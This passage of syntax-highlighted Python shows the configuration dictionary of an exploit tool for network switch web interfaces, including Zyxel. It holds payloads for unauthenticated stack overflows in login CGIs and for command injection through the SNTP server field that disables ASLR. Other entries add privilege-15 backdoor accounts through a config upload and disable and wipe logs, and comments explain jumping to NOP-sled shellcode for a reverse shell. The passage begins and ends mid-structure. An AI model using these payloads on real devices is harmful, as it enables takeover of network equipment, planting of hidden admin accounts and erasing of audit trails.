							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'Copy: Illegal software format'</span><span class="token punctuation">,</span> <span class="token comment"># Not the real content, its the result of invalid firmware (workaround)</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'Copy: Illegal software format'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'login.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in login.cgi (PoC: create file /tmp/VUL.TXT)'</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'file'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/VUL.TXT'</span><span class="token punctuation">,</span> <span class="token comment"># We cannot control the content...</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">40</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'&amp;password='</span><span class="token operator">+</span> <span class="token string">'/'</span> <span class="token operator">*</span> <span class="token number">23</span> <span class="token operator">+</span><span class="token string">'/tmp/VUL.TXT&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token string">'1'</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
						<span class="token string">'set.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment"># 'username' also suffer from stack overflow</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: crash CGI)'</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'502'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username=admin&amp;password='</span> <span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">312</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">'&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpupload.cgi?XXX'</span><span class="token punctuation">,</span> <span class="token comment"># Including alignment of opcodes in memory</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">False</span> <span class="token comment"># Boa/Hydra restart/watchdog, False = no restart, True = restart</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'priv15_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/Update running-config (PoC: add priv 15 credentials)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">'clear'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" password PASSWORD\n\n------'</span><span class="token punctuation">,</span>
						<span class="token comment">#'encryption':'nopassword',</span>
						<span class="token comment">#'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" nopassword\n\n------', # Yep, working too</span>
						<span class="token string">'add_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/httpuploadruncfg.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'del_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;user=USERNAME&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'del_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_acctDel'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'SNTP command injection (PoC: disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'enable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_time'</span><span class="token punctuation">,</span>
						<span class="token string">'enable_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;sntp=1&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/get.cgi?cmd=sys_time'</span><span class="token punctuation">,</span>
						<span class="token string">'inject_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_time'</span><span class="token punctuation">,</span>
						<span class="token string">'inject_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;sntp=1&amp;srvDef=ipv4&amp;srvHost=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;port=139&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'check_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;sntp=1&amp;srvDef=ipv4&amp;srvHost=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check`&amp;port=139&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_time'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;sntp=1&amp;timezone=0&amp;srvDef=ipv4&amp;srvHost=+&amp;port=139&amp;dlsType=0&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=sys_time'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;sntp=0&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token comment">#</span>
					<span class="token comment"># The stack overflow in 'username' and 'password' at same request are multipurpose.</span>
					<span class="token comment">#</span>

					<span class="token comment">#</span>
					<span class="token comment"># The trick to jump and execute:</span>
					<span class="token comment"># 1. Code: username=[garbage][RA + 0x58000000]&amp;password=[garbage][NULL termination]</span>
					<span class="token comment"># 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary</span>
					<span class="token comment"># 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)</span>
					<span class="token comment"># 4. We will also feed required function parameters, by adding them to '_CMD_'</span>
					<span class="token comment">#</span>
					<span class="token string">'stack_cgi_diag'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>

						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">348</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">308</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_ping_post_SIGSEGV'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>		<span class="token comment"># SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>

					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_log'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable/Clean logs)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">348</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">308</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_&amp;_de=1":{}}'</span><span class="token punctuation">,</span>

						<span class="token comment">#'log_settings_set_cmd':'&amp;logState=1&amp;consoleState=1&amp;ramState=1&amp;fileState=1',	# Enable Logging CMD</span>
						<span class="token string">'log_settings_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;empty=1'</span><span class="token punctuation">,</span>			<span class="token comment"># Disable Logging CMD</span>
						<span class="token string">'log_settings_set_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>			<span class="token comment"># Disable Logging SIGSEGV ?</span>

						<span class="token string">'log_ramClear_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;target=0'</span><span class="token punctuation">,</span>				<span class="token comment"># Clean RAM CMD</span>
						<span class="token string">'log_ramClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># Clean RAM SIGSEGV ?</span>

						<span class="token string">'log_fileClear_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;target=1'</span><span class="token punctuation">,</span>			<span class="token comment"># Clean FILE log CMD</span>
						<span class="token string">'log_fileClear_SIGSEGV'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span>				<span class="token comment"># Clean FILE log SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'stack_cgi_sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: Disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">348</span><span class="token punctuation">)</span><span class="token operator">+</span> <span class="token string">'_JUMP_&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">308</span><span class="token punctuation">)</span> <span class="token operator">+</span><span class="token string">'_CMD_&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSntp_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp=1&amp;srvDef=ipv4&amp;srvHost=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;port=139&amp;dlsType=0'</span><span class="token punctuation">,</span>
						<span class="token string">'sys_timeSntp_set_check'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp=1&amp;srvDef=ipv4&amp;srvHost=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check`&amp;port=139&amp;dlsType=0'</span><span class="token punctuation">,</span>

						<span class="token string">'sys_timeSntpDel_set_cmd'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp=1&amp;srvDef=ipv4&amp;srvHost=+&amp;port=139&amp;dlsType=0'</span><span class="token punctuation">,</span>				<span class="token comment"># CMD</span>

						<span class="token string">'sys_timeSettings_set_cmd_enable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp=1'</span><span class="token punctuation">,</span>	<span class="token comment"># Enable CMD</span>
						<span class="token string">'sys_timeSettings_set_cmd_disable'</span><span class="token punctuation">:</span><span class="token string">'&amp;sntp=0'</span><span class="token punctuation">,</span>	<span class="token comment"># Disable CMD</span>
						<span class="token string">'sys_timeSettings_set_SIGSEGV'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>		<span class="token comment"># SIGSEGV ?</span>

						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'verify_uri'</span><span class="token punctuation">:</span><span class="token string">'/tmp/check'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token comment">#</span>
					<span class="token comment"># After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.</span>
					<span class="token comment"># Then we will start walk down from top of stack to hit the NOP sled to execute shellcode</span>
					<span class="token comment">#</span>
					<span class="token string">'heack_cgi_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_loginAuth'</span><span class="token punctuation">,</span>
						<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi/set.cgi?cmd=home_logout'</span><span class="token punctuation">,</span>
						<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'{"_ds=1&amp;username=_ALIGN_USRNOP_SHELLCODE&amp;password=_PWDNOP_RA_START&amp;_de=1":{}}'</span><span class="token punctuation">,</span>
						<span class="token string">'stack'</span><span class="token punctuation">:</span><span class="token boolean">True</span><span class="token punctuation">,</span> <span class="token comment"># False = use Heap, and there are no ASLR</span>
						<span class="token string">'workaround'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>	<span class="token comment"># My LAB workaround</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>

				<span class="token punctuation">}</span><span class="token punctuation">,</span>
			<span class="token punctuation">}</span><span class="token punctuation">,</span>

			<span class="token string">'Zyxel'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
				<span class="token string">'vendor'</span><span class="token punctuation">:</span> <span class="token string">'Zyxel Communications Corp.'</span><span class="token punctuation">,</span>
				<span class="token string">'modulus_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_JSON'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'info_leak_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
				<span class="token string">'xsid'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
				<span class="token string">'xsid_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
				<span class="token string">'login'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Login/Logout on remote device'</span><span class="token punctuation">,</span>
					<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
					<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">'encode'</span><span class="token punctuation">,</span>
					<span class="token string">'login_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
					<span class="token string">'query'</span><span class="token punctuation">:</span><span class="token string">'username=USERNAME&amp;password=PASSWORD&amp;login=1'</span><span class="token punctuation">,</span>
					<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=547'</span><span class="token punctuation">,</span>
					<span class="token string">'logout_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=3'</span><span class="token punctuation">,</span>
					<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
					<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'log'</span><span class="token punctuation">:</span><span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Disable and clean logs'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'disable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'disable_query'</span><span class="token punctuation">:</span><span class="token string">'LOGGING_SERVICE=0&amp;cmd=4353'</span><span class="token punctuation">,</span>
						<span class="token string">'status'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=4352'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logfile_query'</span><span class="token punctuation">:</span><span class="token string">'cmd_4364=Clear+file+messages'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'clean_logmem_query'</span><span class="token punctuation">:</span><span class="token string">'cmd_4364=Clear+buffered+messages'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token comment"># Verify lacking authentication</span>
				<span class="token string">'verify'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'dispatcher.cgi'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span> <span class="token comment"># 'username' also suffer from heap overflow</span>
							<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Stack overflow in "username/password" (PoC: crash CGI)'</span><span class="token punctuation">,</span>
							<span class="token string">'response'</span><span class="token punctuation">:</span><span class="token string">'502'</span><span class="token punctuation">,</span>
							<span class="token string">'Content-Type'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=1'</span><span class="token punctuation">,</span>
							<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'username='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">112</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">'&amp;password='</span><span class="token operator">+</span> self<span class="token punctuation">.</span>random_string<span class="token punctuation">(</span><span class="token number">60</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">'&amp;STARTUP_BACKUP=1'</span><span class="token punctuation">,</span>
							<span class="token string">'check_uri'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'content_check'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
							<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
							<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
						<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token punctuation">}</span><span class="token punctuation">,</span>
				<span class="token string">'exploit'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
					<span class="token string">'heack_hydra_shell'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)'</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpupload.cgi?XXX'</span><span class="token punctuation">,</span> <span class="token comment"># Including alignment of opcodes in memory</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">False</span> <span class="token comment"># Boa/Hydra restart/watchdog, False = no restart, True = restart</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span>
					<span class="token string">'priv15_account'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'Upload/Update running-config (PoC: add priv 15 credentials)'</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'encryption'</span><span class="token punctuation">:</span><span class="token string">'clear'</span><span class="token punctuation">,</span>
						<span class="token string">'content'</span><span class="token punctuation">:</span><span class="token string">'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" password PASSWORD\n\n------'</span><span class="token punctuation">,</span>
						<span class="token comment">#'encryption':'nopassword',</span>
						<span class="token comment">#'content':'Content-Type\n\nSYSTEM CONFIG FILE ::= BEGIN\nusername "USERNAME" nopassword\n\n------', # Yep, working too</span>
						<span class="token string">'add_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/httpuploadruncfg.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'del_query'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span> 
						<span class="token string">'del_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi?cmd=524&amp;usrName=USERNAME'</span><span class="token punctuation">,</span>
						<span class="token string">'vulnerable'</span><span class="token punctuation">:</span> <span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'safe'</span><span class="token punctuation">:</span> <span class="token boolean">True</span>
					<span class="token punctuation">}</span><span class="token punctuation">,</span> 
					<span class="token string">'sntp'</span><span class="token punctuation">:</span> <span class="token punctuation">{</span>
						<span class="token string">'description'</span><span class="token punctuation">:</span><span class="token string">'SNTP command injection (PoC: disable ASLR)'</span><span class="token punctuation">,</span>
						<span class="token string">'json'</span><span class="token punctuation">:</span><span class="token boolean">False</span><span class="token punctuation">,</span>
						<span class="token string">'authenticated'</span><span class="token punctuation">:</span> <span class="token boolean">True</span><span class="token punctuation">,</span>
						<span class="token string">'enable_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'enable_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_enable=1&amp;cmd=548'</span><span class="token punctuation">,</span>
						<span class="token string">'status_uri'</span><span class="token punctuation">:</span><span class="token string">''</span><span class="token punctuation">,</span>
						<span class="token string">'inject_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'inject_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_Server=`echo 0 &gt; /proc/sys/kernel/randomize_va_space`&amp;sntp_Port=123&amp;cmd=550'</span><span class="token punctuation">,</span>
						<span class="token string">'check_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_Server=`cat /proc/sys/kernel/randomize_va_space &gt; /tmp/check`&amp;sntp_Port=123&amp;cmd=550'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_uri'</span><span class="token punctuation">:</span><span class="token string">'/cgi-bin/dispatcher.cgi'</span><span class="token punctuation">,</span>
						<span class="token string">'delete_query'</span><span class="token punctuation">:</span><span class="token string">'sntp_Server=+&amp;sntp_Port=139&amp;cmd=550'</span><span class="token punctuation">,</span>
